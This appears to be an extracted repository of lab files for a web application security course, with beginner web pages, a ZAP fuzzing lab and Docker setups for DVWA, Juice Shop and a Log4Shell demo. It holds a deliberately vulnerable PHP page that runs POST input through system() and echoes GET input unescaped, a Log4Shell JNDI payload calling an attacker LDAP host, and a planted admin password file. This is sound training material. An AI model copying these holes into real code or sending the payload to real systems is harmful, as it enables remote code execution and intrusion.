Repository: mttaggart/pwst-resources
Branch: main
Commit: 3666b8bc181e
Files: 37
Total size: 20.6 KB
Directory structure:
gitextract_j2bls_bd/
├── 2-10_zap-lab/
│ ├── run.sh
│ └── site/
│ ├── about.html
│ ├── contact.html
│ ├── index.css
│ ├── index.html
│ ├── index.js
│ ├── links.html
│ ├── pw_backup.txt
│ └── secret.html
├── 2-4_web-trinity/
│ ├── index.css
│ ├── index.html
│ └── index.js
├── 2-5_html/
│ ├── index.css
│ └── index.html
├── 2-6_css/
│ ├── index.css
│ └── index.html
├── 2-7_js/
│ ├── index.css
│ ├── index.html
│ └── index.js
├── 2-8_alert-lab/
│ ├── index.css
│ ├── index.html
│ └── index.js
├── 3-1_php-intro/
│ ├── index.css
│ ├── index.php
│ └── run.sh
├── 3-2_php-lab/
│ ├── index.css
│ ├── index.php
│ └── run.sh
├── 3-4_lab-wordpress/
│ ├── docker-compose.yml
│ └── wp-dockerfile
├── 3-5_lab-dvwa/
│ └── docker-compose.yml
├── 4-9_lab-log4shell/
│ └── run.sh
├── 5-2_juice-shop/
│ └── run.sh
├── README.md
├── docker-setup/
│ └── setup.sh
└── kali-setup/
├── setup.sh
└── terminatorconfig
================================================
FILE CONTENTS
================================================
================================================
FILE: 2-10_zap-lab/run.sh
================================================
#!/bin/bash
docker container run --name pwst-2-10 --rm -d -v $(pwd)/site:/usr/share/nginx/html -p 80:80 nginx:latest
================================================
FILE: 2-10_zap-lab/site/about.html
================================================
<html>
<head>
<title>2-10: ZAP Spidering/Fuzzing</title>
<link rel="stylesheet" type="text/css" href="index.css">
</head>
<body>
<h1>About</h1>
<nav>
<a href="index.html">Home</a>
<a href="about.html">About</a>
<a href="contact.html">Contact</a>
<a href="links.html">Links</a>
</nav>
<p>
On many sites, the <code>About</code> page can provide
important insights about the target, including potential
usernames or even password guesses!
</p>
<!-- Note: Remove the pw_backup.txt file from the web root -->
</body>
</html>
================================================
FILE: 2-10_zap-lab/site/contact.html
================================================
<html>
<head>
<title>2-10: ZAP Spidering/Fuzzing</title>
<link rel="stylesheet" type="text/css" href="index.css">
</head>
<body>
<h1>Contact</h1>
<nav>
<a href="index.html">Home</a>
<a href="about.html">About</a>
<a href="contact.html">Contact</a>
<a href="links.html">Links</a>
</nav>
<p>
The <code>Contact</code> page can provide login info, and may in fact be an
attack vector, depending on what the contact form does.
</p>
<form id="contact-form">
<label for="email">Email</label>
<input type="email" name="email" placeholder="user@domain.com" />
<label for="message">Message</label>
<textarea name="message"></textarea>
<button type="submit">Submit</button>
</form>
<script>
document.getElementById("contact-form")
.addEventListener("submit", (e) => {
e.preventDefault();
console.log(e);
alert("Message sent!");
});
</script>
</body>
</html>
================================================
FILE: 2-10_zap-lab/site/index.css
================================================
body {
background: #202020;
color: antiquewhite;
font-size: 24px;
font-family: sans-serif;
}
h1 {
color: magenta;
}
code {
color: magenta;
}
a {
color: magenta;
}
nav a {
background: #424242;
color: antiquewhite;
padding: 10px;
font-size: 2rem;
border-radius: 5px;
}
label,textarea {
display: block;
}
textarea {
height: 300px;
width: 400px;
}
.info {
color: cyan;
}
.special {
background: #929292;
color: antiquewhite;
text-shadow: 1px 1px 1px black;
padding: 10px;
border-radius: 5px;
}
.special code {
color: #8100a1;
}
================================================
FILE: 2-10_zap-lab/site/index.html
================================================
<html>
<head>
<title>2-10: ZAP Spidering/Fuzzing</title>
<link rel="stylesheet" type="text/css" href="index.css">
</head>
<body>
<h1>2-10: ZAP Spidering and Fuzzing</h1>
<nav>
<a href="index.html">Home</a>
<a href="about.html">About</a>
<a href="contact.html">Contact</a>
<a href="links.html">Links</a>
</nav>
<p>
In this lab, you need to use ZAP to spider this tiny site and discover the attached
pages and assets.
</p>
<p>
But beware: spidering is not all you need to do. There's a <b>secret</b> page
that you'll have to find by fuzzing!
</p>
<script src="index.js"></script>
</body>
</html>
================================================
FILE: 2-10_zap-lab/site/index.js
================================================
// Just because it isn't HTML doesn't mean you can ignore the file!
//
// If you haven't found it yet, try looking for test.html
================================================
FILE: 2-10_zap-lab/site/links.html
================================================
<html>
<head>
<title>2-10: ZAP Spidering/Fuzzing</title>
<link rel="stylesheet" type="text/css" href="index.css">
</head>
<body>
<h1>Links</h1>
<nav>
<a href="index.html">Home</a>
<a href="about.html">About</a>
<a href="contact.html">Contact</a>
<a href="links.html">Links</a>
</nav>
<p>
Fuzzing is a bit of an art form, but there are lots of tools to help.
</p>
<p>
I always keep a copy of Daniel Miessler's <a href="https://github.com/danielmiessler/SecLists">SecLists</a> handy for enumeration of all kinds.
</p>
</body>
</html>
================================================
FILE: 2-10_zap-lab/site/pw_backup.txt
================================================
# Backup password for site admin:
admin:passw0rd!!
================================================
FILE: 2-10_zap-lab/site/secret.html
================================================
<html>
<head>
<title>2-10: ZAP Spidering/Fuzzing</title>
<link rel="stylesheet" type="text/css" href="index.css">
</head>
<body>
<h1>Congrats!</h1>
<nav>
<a href="index.html">Home</a>
<a href="about.html">About</a>
<a href="contact.html">Contact</a>
<a href="links.html">Links</a>
</nav>
<p>
Congrats! You found the secret page!
</p>
</body>
</html>
================================================
FILE: 2-4_web-trinity/index.css
================================================
body {
background: #202020;
color: white;
font-size: 24px;
font-family: sans-serif;
}
h1 {
color: cyan;
}
h1.toggled {
color: magenta;
}
================================================
FILE: 2-4_web-trinity/index.html
================================================
<html>
<head>
<title>Hello, World!</title>
<link rel="stylesheet" type="text/css" href="index.css">
</head>
<body>
<h1 id="hello-world">Hello, World!</h1>
<p>This page demonstrates the interaction between HTML, JavaScript, and CSS.</p>
<button id="title-toggle">Click Me!</button>
<script src="index.js"></script>
</body>
</html>
================================================
FILE: 2-4_web-trinity/index.js
================================================
// Capture the toggle button and save it in a variable
let toggleButton = document.getElementById("title-toggle");
// Add an EventListener that determines what happens
// when we click on the button
toggleButton.addEventListener("click", () => {
// We capture the h1 header by its id
let title = document.getElementById("hello-world");
// And on each click, toggle the presence of the 'toggled' class
// Because our CSS has specific styling for the class,
// the title will change color when the class is present.
title.classList.toggle("toggled");
})
================================================
FILE: 2-5_html/index.css
================================================
body {
background: #202020;
color: white;
font-size: 24px;
font-family: sans-serif;
}
h1 {
color: cyan;
}
h1.toggled {
color: magenta;
}
================================================
FILE: 2-5_html/index.html
================================================
<html>
<head>
<title>Hello, World!</title>
<link rel="stylesheet" type="text/css" href="index.css">
<style>
code {
color: magenta;
}
#js-content {
text-decoration: underline;
}
</style>
</head>
<body>
<h1 id="hello-world">Hello, World!</h1>
<p>This page goes into more detail about HTML.</p>
<p>The button below uses an <code>onclick</code> attribute to determine its behavior.</p>
<button onclick="alert('I came from an attribute!')">Click Me!</button>
<div id="js-content"></div>
<script>
let jsText = document.createTextNode("This element is not visible with 'View Source' because it is added by JavaScript.");
let jsPar = document.createElement("p");
jsPar.appendChild(jsText);
document.getElementById("js-content").appendChild(jsPar);
</script>
</body>
</html>
================================================
FILE: 2-6_css/index.css
================================================
body {
background: #202020;
color: white;
font-size: 24px;
font-family: sans-serif;
}
h1 {
color: magenta;
}
code {
color: magenta;
}
.info {
color: cyan;
}
.special {
background: #929292;
color: antiquewhite;
text-shadow: 1px 1px 1px black;
padding: 10px;
border-radius: 5px;
}
.special code {
color: #8100a1;
}
================================================
FILE: 2-6_css/index.html
================================================
<html>
<head>
<title>Hello, World!</title>
<link rel="stylesheet" type="text/css" href="index.css">
</head>
<body>
<h1 id="hello-world">Hello, World!</h1>
<p class="info">This page goes into more detail about <b>CSS</b>.</p>
<p class="info">This paragraph and the one before it are styled based on <b>class</b>.</p>
<p>This paragraph, lacking the <code>info</code> class, looks different.</p>
<div class="special">
<p>This paragraph is inheriting its color from the rules for the <code>special</code> class.</p>
</div>
</body>
</html>
================================================
FILE: 2-7_js/index.css
================================================
body {
background: #202020;
color: white;
font-size: 24px;
font-family: sans-serif;
}
h1 {
color: magenta;
}
code {
color: magenta;
}
.info {
color: cyan;
}
.special {
background: #929292;
color: antiquewhite;
text-shadow: 1px 1px 1px black;
padding: 10px;
border-radius: 5px;
}
.special code {
color: #8100a1;
}
#color-changer {
height: 250px;
width: 250px;
margin: auto;
border: 4px dashed magenta;
}
================================================
FILE: 2-7_js/index.html
================================================
<html>
<head>
<title>Hello, World!</title>
<link rel="stylesheet" type="text/css" href="index.css">
</head>
<body>
<h1 id="hello-world">Hello, World!</h1>
<p class="info">This page goes into more detail about <b>JavaScript</b>.</p>
<p class="info">
Below is a set of sliders, and a <code>div</code> element.
The <code>div</code>'s color is set by the 3 sliders, which
correspond to Red, Green, and Blue values.
This adjustment is handled by the <b>JavaScript</b> linked
to this page.
</p>
<div class="form-control">
<label for="slider-red">Red</label>
<input class="color-slider" id="slider-red" name="slider-red" type="range" min="0" max="255" />
<label for="slider-green">Green</label>
<input class="color-slider" id="slider-green" name="slider-green" type="range" min="0" max="255" />
<label for="slider-blue">Blue</label>
<input class="color-slider" id="slider-blue" name="slider-blue" type="range" min="0" max="255" />
</div>
<div id="color-changer"></div>
<script src="index.js"></script>
</body>
</html>
================================================
FILE: 2-7_js/index.js
================================================
// Utility function to retrieve the current slider values
function getCurrentColor() {
let red = document.getElementById("slider-red").value;
let green = document.getElementById("slider-green").value;
let blue = document.getElementById("slider-blue").value;
return [red, green, blue];
}
// Performs the hard work of updating the color
// Simply grabs the current slider values and converts them to a CSS background style
function updateColor() {
let colorChanger = document.getElementById("color-changer");
let [red, green, blue] = getCurrentColor();
let newColor = `rgb(${red},${green},${blue})`;
colorChanger.style.setProperty("background", newColor);
}
// Set the default color. Happens on load of this file.
document.getElementById("color-changer").style.setProperty("background", "#646464");
// Add event listeners to the sliders
document
.querySelectorAll(".color-slider")
.forEach(l => {
l.addEventListener("change", updateColor);
});
================================================
FILE: 2-8_alert-lab/index.css
================================================
body {
background: #202020;
color: white;
font-size: 24px;
font-family: sans-serif;
}
h1 {
color: magenta;
}
code {
color: magenta;
}
.info {
color: cyan;
}
.special {
background: #929292;
color: antiquewhite;
text-shadow: 1px 1px 1px black;
padding: 10px;
border-radius: 5px;
}
.special code {
color: #8100a1;
}
#color-changer {
height: 250px;
width: 250px;
margin: auto;
border: 4px dashed magenta;
}
================================================
FILE: 2-8_alert-lab/index.html
================================================
<html>
<head>
<title>2-7: Alert Lab</title>
<link rel="stylesheet" type="text/css" href="index.css">
</head>
<body>
<h1>2-7: Alert Lab</h1>
<p>In this lab, your objective is to make a <code>button</code> that triggers an <code>alert()</code> when clicked.</p>
<p>
There are many ways to accomplish this: inline code, <code>script</code> tags in the HTML, or using the attached <code>index.js</code>. It's up to you!
</p>
<script src="index.js"></script>
</body>
</html>
================================================
FILE: 2-8_alert-lab/index.js
================================================
// You can use this file to add the EventListener to a button you create
================================================
FILE: 3-1_php-intro/index.css
================================================
body {
background: #202020;
color: white;
font-size: 24px;
font-family: sans-serif;
}
h1 {
color: magenta;
}
code {
color: magenta;
}
.info {
color: cyan;
}
.special {
background: #929292;
color: antiquewhite;
text-shadow: 1px 1px 1px black;
padding: 10px;
border-radius: 5px;
}
.special code {
color: #8100a1;
}
#color-changer {
height: 250px;
width: 250px;
margin: auto;
border: 4px dashed magenta;
}
================================================
FILE: 3-1_php-intro/index.php
================================================
<html>
<head>
<title>3-1: PHP Intro</title>
<link type="text/css" rel="stylesheet" href="index.css">
</head>
<body>
<h1>3-1: PHP Intro</h1>
<p>
This may look like an ordinary HTML page, but it has
PHP code.
</p>
<p>
Use a text editor to change these names, then reload the page!
</p>
<?php
$names = array("Jean-Luc", "Will","Deanna", "Beverly","Geordi","Data","Worf");
echo "<ul>";
foreach($names as $name) {
echo "<li>". $name . "</li>";
}
echo "</ul>";
?>
</body>
</html>
================================================
FILE: 3-1_php-intro/run.sh
================================================
#!/bin/bash
docker container run --rm -d -p 8000:80 --name 3-1_php-intro -v $(pwd):/var/www/html php:8.1-apache
================================================
FILE: 3-2_php-lab/index.css
================================================
body {
background: #202020;
color: white;
font-size: 24px;
font-family: sans-serif;
}
h1 {
color: magenta;
}
code {
color: magenta;
}
.info {
color: cyan;
}
.special {
background: #929292;
color: antiquewhite;
text-shadow: 1px 1px 1px black;
padding: 10px;
border-radius: 5px;
}
.special code {
color: #8100a1;
}
#color-changer {
height: 250px;
width: 250px;
margin: auto;
border: 4px dashed magenta;
}
================================================
FILE: 3-2_php-lab/index.php
================================================
<html>
<head>
<title>3-2: PHP Lab</title>
<link type="text/css" rel="stylesheet" href="index.css">
</head>
<body>
<h1>3-2: PHP Lab</h1>
<p>
This may look like an ordinary HTML page, but it has
PHP code.
</p>
<p>
Try adding a <code>GET</code> parameter to the end of the URL.
Adding <code>?msg=hello</code> should change what you see on this page.
</p>
<p>Bonus: This implmentation is vulnerable to a classic web exploit! See if you can figure it out.</p>
<p>
<?php
// Check for GET Param
if (isset($_GET["msg"])) {
$msg = $_GET["msg"];
echo $msg;
} else {
echo "Did you forget something? Like a <code>msg</code> maybe?";
}
?>
</p>
<?php
// Check for POST params
// This is a truly terrible idea!
if (isset($_POST["cmd"])) {
echo "<pre>";
system($_POST["cmd"]);
echo "</pre>";
} else {
echo "<pre>...</pre>";
}
?>
</body>
</html>
================================================
FILE: 3-2_php-lab/run.sh
================================================
#!/bin/bash
docker container run --rm -d -p 8000:80 --name 3-2_php-lab -v $(pwd):/var/www/html php:8.1-apache
================================================
FILE: 3-4_lab-wordpress/docker-compose.yml
================================================
version: "3.9"
services:
db:
image: mysql:5.7
volumes:
- db_data:/var/lib/mysql
restart: always
environment:
MYSQL_ROOT_PASSWORD: somewordpress
MYSQL_DATABASE: wordpress
MYSQL_USER: wordpress
MYSQL_PASSWORD: wordpress
wordpress:
depends_on:
- db
image: pwst_wordpress
build:
context: .
dockerfile: ./wp-dockerfile
volumes:
- wordpress_data:/var/www/html
ports:
- "8000:80"
restart: always
environment:
WORDPRESS_DB_HOST: db
WORDPRESS_DB_USER: wordpress
WORDPRESS_DB_PASSWORD: wordpress
WORDPRESS_DB_NAME: wordpress
volumes:
db_data: {}
wordpress_data: {}
================================================
FILE: 3-4_lab-wordpress/wp-dockerfile
================================================
FROM wordpress:latest
RUN apt update && apt install -y default-mysql-client
================================================
FILE: 3-5_lab-dvwa/docker-compose.yml
================================================
version: "3.9"
services:
db:
image: mysql:5.7
restart: always
volumes:
- db_data:/var/lib/mysql
environment:
MYSQL_ROOT_PASSWORD: damnvulnerable
MYSQL_DATABASE: dvwa
MYSQL_USER: dvwa
MYSQL_PASSWORD: damnvulnerable
dvwa:
depends_on:
- db
image: cytopia/dvwa:php-8.0-0.1
volumes:
- dvwa_data:/var/www/html
ports:
- "8001:80"
restart: always
environment:
MYSQL_HOSTNAME: db
MYSQL_USERNAME: root
MYSQL_PASSWORD: damnvulnerable
MYSQL_DATABASE: dvwa
volumes:
db_data: {}
dvwa_data: {}
================================================
FILE: 4-9_lab-log4shell/run.sh
================================================
#!/bin/bash
docker container run --name 4-9_log4shell --rm -d -p 8888:8080 korteke/log4shell-demo
echo "Container running! Exploit with"
echo curl -A \${jndi:ldap://kali-ip:1389/a} http://pwst-server:8888/
================================================
FILE: 5-2_juice-shop/run.sh
================================================
#!/bin/bash
docker container run -d -e NODE_ENV=unsafe --restart=on-failure --name juice_shop -p 8002:3000 bkimminich/juice-shop
================================================
FILE: README.md
================================================
# PWST Resources
This repository contains resources for students taking the Taggart Institute course "Practical Webapp Security and Testing."
## Usage
Code in the repo is used for lab setup and for specific lab exercises. It should be cloned onto both the Kali VM and the Ubuntu VM.
To download this repo, in a Terminal, run:
```bashj
git clone https://github.com/mttaggart/pwst-resources
```
You'll now have the `pwst-resources` folder in your home folder.
## Kali Setup
To run the setup script, Run the following in a Terminal:
```bash
cd ~/pwst-resources/kali-setup
./setup.sh
```
There will be a few points where you need to provide input to the script, but otherwise it should run smoothly. If you wish to use the optional fish shell that is configured, make sure you run the `chsh` command as listed at the end of the install script!
## Docker Setup
This script is meant to be run on the Ubuntu server, **not** on the Kali VM!
To run the setup script, Run the following in a Terminal:
```bash
cd ~/pwst-resources/docker-setup
./setup.sh
```
After you're finished, log out of the server and log back in to use Docker without `sudo`. To test, run:
```bash
docker container run hello-world
```
================================================
FILE: docker-setup/setup.sh
================================================
#!/bin/bash
# Install dependencies
echo "Installing dependencies"
sudo apt update
sudo apt install -y \
ca-certificates
curl
gnupg
lsb-release
echo "Adding Docker source"
curl -fsSL https://download.docker.com/linux/ubuntu/gpg | sudo apt-key add -
sudo add-apt-repository "https://download.docker.com/linux/ubuntu $(lsb_release -cs) stable"
echo "Installing Docker Engine"
sudo apt update && sudo apt install -y docker-ce docker-ce-cli containerd.io docker-compose-plugin
echo "Adding user to docker group"
sudo gpasswd -a $USER docker
echo "Docker is installed; log out and log in to run Docker without sudo!"
================================================
FILE: kali-setup/setup.sh
================================================
#!/bin/bash
# Add Brave Browser Sources
# Brave Browser
echo "Setting up Brave sources"
curl -s https://brave-browser-apt-release.s3.brave.com/brave-core.asc | sudo apt-key --keyring /etc/apt/trusted.gpg.d/brave-browser-release.gpg add -
echo "deb [arch=amd64] https://brave-browser-apt-release.s3.brave.com/ stable main" | sudo tee /etc/apt/sources.list.d/brave-browser-release.list
# Update and add necessary packages
echo "Installing Packages"
sudo apt update
sudo apt install -y fish terminator gedit python3-pip brave-browser vim-gtk3 zaproxy
# Install VSCode
echo "Installing VSCode"
curl -L "https://code.visualstudio.com/sha/download?build=stable&os=linux-deb-x64" -o code.deb
sudo dpkg -i code.deb
rm code.deb
# Setup Rust and Rust tools
echo "Installing Rust and Rust tools"
curl --proto '=https' --tlsv1.2 -sSf https://sh.rustup.rs | sh
~/.cargo/bin/cargo install rustscan
~/.cargo/bin/cargo install feroxbuster
# Setup fonts
mkdir ~/Scripts
cd ~/Scripts
git clone https://github.com/danielmiessler/SecLists
git clone https://github.com/powerline/fonts
cd fonts
chmod +x install.sh
./install.sh
cd ~
# Setup Terminator
mkdir ~/.config/terminator
cp ./terminatorconfig ~/.config/terminator/config
# Setup Shell
curl -kL https://get.oh-my.fish | fish
fish -c "omf install bobthefish && exit"
echo "set -x PATH \$PATH $HOME/.cargo/bin" >> ~/.config/fish/config.fish
echo "Setup is complete! If you wish to use fish, run:\nchsh -s /usr/bin/fish"
================================================
FILE: kali-setup/terminatorconfig
================================================
[global_config]
enabled_plugins = LaunchpadCodeURLHandler, APTURLHandler, MavenPluginURLHandler, LaunchpadBugURLHandler
title_transmit_bg_color = "#204a87"
[keybindings]
[layouts]
[[default]]
[[[child1]]]
parent = window0
type = Terminal
[[[window0]]]
parent = ""
type = Window
[plugins]
[profiles]
[[default]]
background_darkness = 0.8
font = Source Code Pro for Powerline 11
background_type = transparent
cursor_color = "#aaaaaa"
scrollbar_position = hidden
[[Future]]
background_darkness = 0.8
background_type = transparent
cursor_color = "#aaaaaa"
font = Unispace 11
foreground_color = "#0064fa"
scrollbar_position = hidden
use_system_font = False
[[High Contrast]]
background_color = "#ffffff"
cursor_color = "#aaaaaa"
foreground_color = "#000000"
[[Streaming]]
background_color = "#0e0e0e"
cursor_color = "#aaaaaa"
foreground_color = "#d3d7cf"
palette = "#000000:#cc0000:#4e9a06:#c4a000:#3465a4:#75507b:#06989a:#d3d7cf:#555753:#ef2929:#8ae234:#fce94f:#729fcf:#ad7fa8:#34e2e2:#eeeeec"
scrollbar_position = hidden
gitextract_j2bls_bd/
├── 2-10_zap-lab/
│ ├── run.sh
│ └── site/
│ ├── about.html
│ ├── contact.html
│ ├── index.css
│ ├── index.html
│ ├── index.js
│ ├── links.html
│ ├── pw_backup.txt
│ └── secret.html
├── 2-4_web-trinity/
│ ├── index.css
│ ├── index.html
│ └── index.js
├── 2-5_html/
│ ├── index.css
│ └── index.html
├── 2-6_css/
│ ├── index.css
│ └── index.html
├── 2-7_js/
│ ├── index.css
│ ├── index.html
│ └── index.js
├── 2-8_alert-lab/
│ ├── index.css
│ ├── index.html
│ └── index.js
├── 3-1_php-intro/
│ ├── index.css
│ ├── index.php
│ └── run.sh
├── 3-2_php-lab/
│ ├── index.css
│ ├── index.php
│ └── run.sh
├── 3-4_lab-wordpress/
│ ├── docker-compose.yml
│ └── wp-dockerfile
├── 3-5_lab-dvwa/
│ └── docker-compose.yml
├── 4-9_lab-log4shell/
│ └── run.sh
├── 5-2_juice-shop/
│ └── run.sh
├── README.md
├── docker-setup/
│ └── setup.sh
└── kali-setup/
├── setup.sh
└── terminatorconfig
SYMBOL INDEX (2 symbols across 1 files)
FILE: 2-7_js/index.js
function getCurrentColor (line 3) | function getCurrentColor() {
function updateColor (line 12) | function updateColor() {
Condensed preview — 37 files, each showing path, character count, and a content snippet. Download the .json file or copy for the full structured content (24K chars).
[
{
"path": "2-10_zap-lab/run.sh",
"chars": 118,
"preview": "#!/bin/bash\n\ndocker container run --name pwst-2-10 --rm -d -v $(pwd)/site:/usr/share/nginx/html -p 80:80 nginx:latest\n"
},
{
"path": "2-10_zap-lab/site/about.html",
"chars": 685,
"preview": "<html>\n <head>\n <title>2-10: ZAP Spidering/Fuzzing</title>\n <link rel=\"stylesheet\" type=\"text/css\" href"
},
{
"path": "2-10_zap-lab/site/contact.html",
"chars": 1167,
"preview": "<html>\n <head>\n <title>2-10: ZAP Spidering/Fuzzing</title>\n <link rel=\"stylesheet\" type=\"text/css\" href"
},
{
"path": "2-10_zap-lab/site/index.css",
"chars": 619,
"preview": "body {\n background: #202020;\n color: antiquewhite;\n font-size: 24px;\n font-family: sans-serif;\n}\n\nh1 {\n c"
},
{
"path": "2-10_zap-lab/site/index.html",
"chars": 786,
"preview": "<html>\n <head>\n <title>2-10: ZAP Spidering/Fuzzing</title>\n <link rel=\"stylesheet\" type=\"text/css\" href"
},
{
"path": "2-10_zap-lab/site/index.js",
"chars": 129,
"preview": "// Just because it isn't HTML doesn't mean you can ignore the file!\n//\n// If you haven't found it yet, try looking for t"
},
{
"path": "2-10_zap-lab/site/links.html",
"chars": 692,
"preview": "<html>\n <head>\n <title>2-10: ZAP Spidering/Fuzzing</title>\n <link rel=\"stylesheet\" type=\"text/css\" href"
},
{
"path": "2-10_zap-lab/site/pw_backup.txt",
"chars": 52,
"preview": "# Backup password for site admin:\n\nadmin:passw0rd!!\n"
},
{
"path": "2-10_zap-lab/site/secret.html",
"chars": 482,
"preview": "<html>\n <head>\n <title>2-10: ZAP Spidering/Fuzzing</title>\n <link rel=\"stylesheet\" type=\"text/css\" href"
},
{
"path": "2-4_web-trinity/index.css",
"chars": 162,
"preview": "body {\n background: #202020;\n color: white;\n font-size: 24px;\n font-family: sans-serif;\n}\n\nh1 {\n color: c"
},
{
"path": "2-4_web-trinity/index.html",
"chars": 393,
"preview": "<html>\n <head>\n <title>Hello, World!</title>\n <link rel=\"stylesheet\" type=\"text/css\" href=\"index.css\">\n"
},
{
"path": "2-4_web-trinity/index.js",
"chars": 579,
"preview": "\n// Capture the toggle button and save it in a variable\nlet toggleButton = document.getElementById(\"title-toggle\");\n\n// "
},
{
"path": "2-5_html/index.css",
"chars": 162,
"preview": "body {\n background: #202020;\n color: white;\n font-size: 24px;\n font-family: sans-serif;\n}\n\nh1 {\n color: c"
},
{
"path": "2-5_html/index.html",
"chars": 999,
"preview": "<html>\n <head>\n <title>Hello, World!</title>\n <link rel=\"stylesheet\" type=\"text/css\" href=\"index.css\">\n"
},
{
"path": "2-6_css/index.css",
"chars": 369,
"preview": "body {\n background: #202020;\n color: white;\n font-size: 24px;\n font-family: sans-serif;\n}\n\nh1 {\n color: m"
},
{
"path": "2-6_css/index.html",
"chars": 635,
"preview": "<html>\n <head>\n <title>Hello, World!</title>\n <link rel=\"stylesheet\" type=\"text/css\" href=\"index.css\">\n"
},
{
"path": "2-7_js/index.css",
"chars": 476,
"preview": "body {\n background: #202020;\n color: white;\n font-size: 24px;\n font-family: sans-serif;\n}\n\nh1 {\n color: m"
},
{
"path": "2-7_js/index.html",
"chars": 1239,
"preview": "<html>\n <head>\n <title>Hello, World!</title>\n <link rel=\"stylesheet\" type=\"text/css\" href=\"index.css\">\n"
},
{
"path": "2-7_js/index.js",
"chars": 999,
"preview": "\n// Utility function to retrieve the current slider values\nfunction getCurrentColor() {\n let red = document.getElemen"
},
{
"path": "2-8_alert-lab/index.css",
"chars": 476,
"preview": "body {\n background: #202020;\n color: white;\n font-size: 24px;\n font-family: sans-serif;\n}\n\nh1 {\n color: m"
},
{
"path": "2-8_alert-lab/index.html",
"chars": 553,
"preview": "<html>\n <head>\n <title>2-7: Alert Lab</title>\n <link rel=\"stylesheet\" type=\"text/css\" href=\"index.css\">"
},
{
"path": "2-8_alert-lab/index.js",
"chars": 72,
"preview": "// You can use this file to add the EventListener to a button you create"
},
{
"path": "3-1_php-intro/index.css",
"chars": 476,
"preview": "body {\n background: #202020;\n color: white;\n font-size: 24px;\n font-family: sans-serif;\n}\n\nh1 {\n color: m"
},
{
"path": "3-1_php-intro/index.php",
"chars": 673,
"preview": "<html>\n <head>\n <title>3-1: PHP Intro</title>\n <link type=\"text/css\" rel=\"stylesheet\" href=\"index.css\">"
},
{
"path": "3-1_php-intro/run.sh",
"chars": 112,
"preview": "#!/bin/bash\ndocker container run --rm -d -p 8000:80 --name 3-1_php-intro -v $(pwd):/var/www/html php:8.1-apache\n"
},
{
"path": "3-2_php-lab/index.css",
"chars": 476,
"preview": "body {\n background: #202020;\n color: white;\n font-size: 24px;\n font-family: sans-serif;\n}\n\nh1 {\n color: m"
},
{
"path": "3-2_php-lab/index.php",
"chars": 1256,
"preview": "<html>\n <head>\n <title>3-2: PHP Lab</title>\n <link type=\"text/css\" rel=\"stylesheet\" href=\"index.css\">\n "
},
{
"path": "3-2_php-lab/run.sh",
"chars": 110,
"preview": "#!/bin/bash\ndocker container run --rm -d -p 8000:80 --name 3-2_php-lab -v $(pwd):/var/www/html php:8.1-apache\n"
},
{
"path": "3-4_lab-wordpress/docker-compose.yml",
"chars": 705,
"preview": "version: \"3.9\"\n \nservices:\n db:\n image: mysql:5.7\n volumes:\n - db_data:/var/lib/mysql\n restart: always"
},
{
"path": "3-4_lab-wordpress/wp-dockerfile",
"chars": 78,
"preview": "FROM wordpress:latest\nRUN apt update && apt install -y default-mysql-client \n\n"
},
{
"path": "3-5_lab-dvwa/docker-compose.yml",
"chars": 609,
"preview": "version: \"3.9\"\n \nservices:\n db:\n image: mysql:5.7\n restart: always\n volumes:\n - db_data:/var/lib/mysql"
},
{
"path": "4-9_lab-log4shell/run.sh",
"chars": 207,
"preview": "#!/bin/bash\ndocker container run --name 4-9_log4shell --rm -d -p 8888:8080 korteke/log4shell-demo\n\necho \"Container runni"
},
{
"path": "5-2_juice-shop/run.sh",
"chars": 129,
"preview": "#!/bin/bash\ndocker container run -d -e NODE_ENV=unsafe --restart=on-failure --name juice_shop -p 8002:3000 bkimminich/ju"
},
{
"path": "README.md",
"chars": 1214,
"preview": "# PWST Resources\n\nThis repository contains resources for students taking the Taggart Institute course \"Practical Webapp "
},
{
"path": "docker-setup/setup.sh",
"chars": 634,
"preview": "#!/bin/bash\n\n# Install dependencies\necho \"Installing dependencies\"\nsudo apt update\nsudo apt install -y \\\n ca-certific"
},
{
"path": "kali-setup/setup.sh",
"chars": 1461,
"preview": "#!/bin/bash\n\n# Add Brave Browser Sources\n# Brave Browser\necho \"Setting up Brave sources\"\ncurl -s https://brave-browser-a"
},
{
"path": "kali-setup/terminatorconfig",
"chars": 1144,
"preview": "[global_config]\n enabled_plugins = LaunchpadCodeURLHandler, APTURLHandler, MavenPluginURLHandler, LaunchpadBugURLHandle"
}
]
About this extraction
This page contains the full source code of the mttaggart/pwst-resources GitHub repository, extracted and formatted as plain text for AI agents and large language models (LLMs). The extraction includes 37 files (20.6 KB), approximately 6.9k tokens, and a symbol index with 2 extracted functions, classes, methods, constants, and types. Use this with OpenClaw, Claude, ChatGPT, Cursor, Windsurf, or any other AI tool that accepts text input. You can copy the full output to your clipboard or download it as a .txt file.
Extracted by GitExtract — free GitHub repo to text converter for AI. Built by Nikandr Surkov.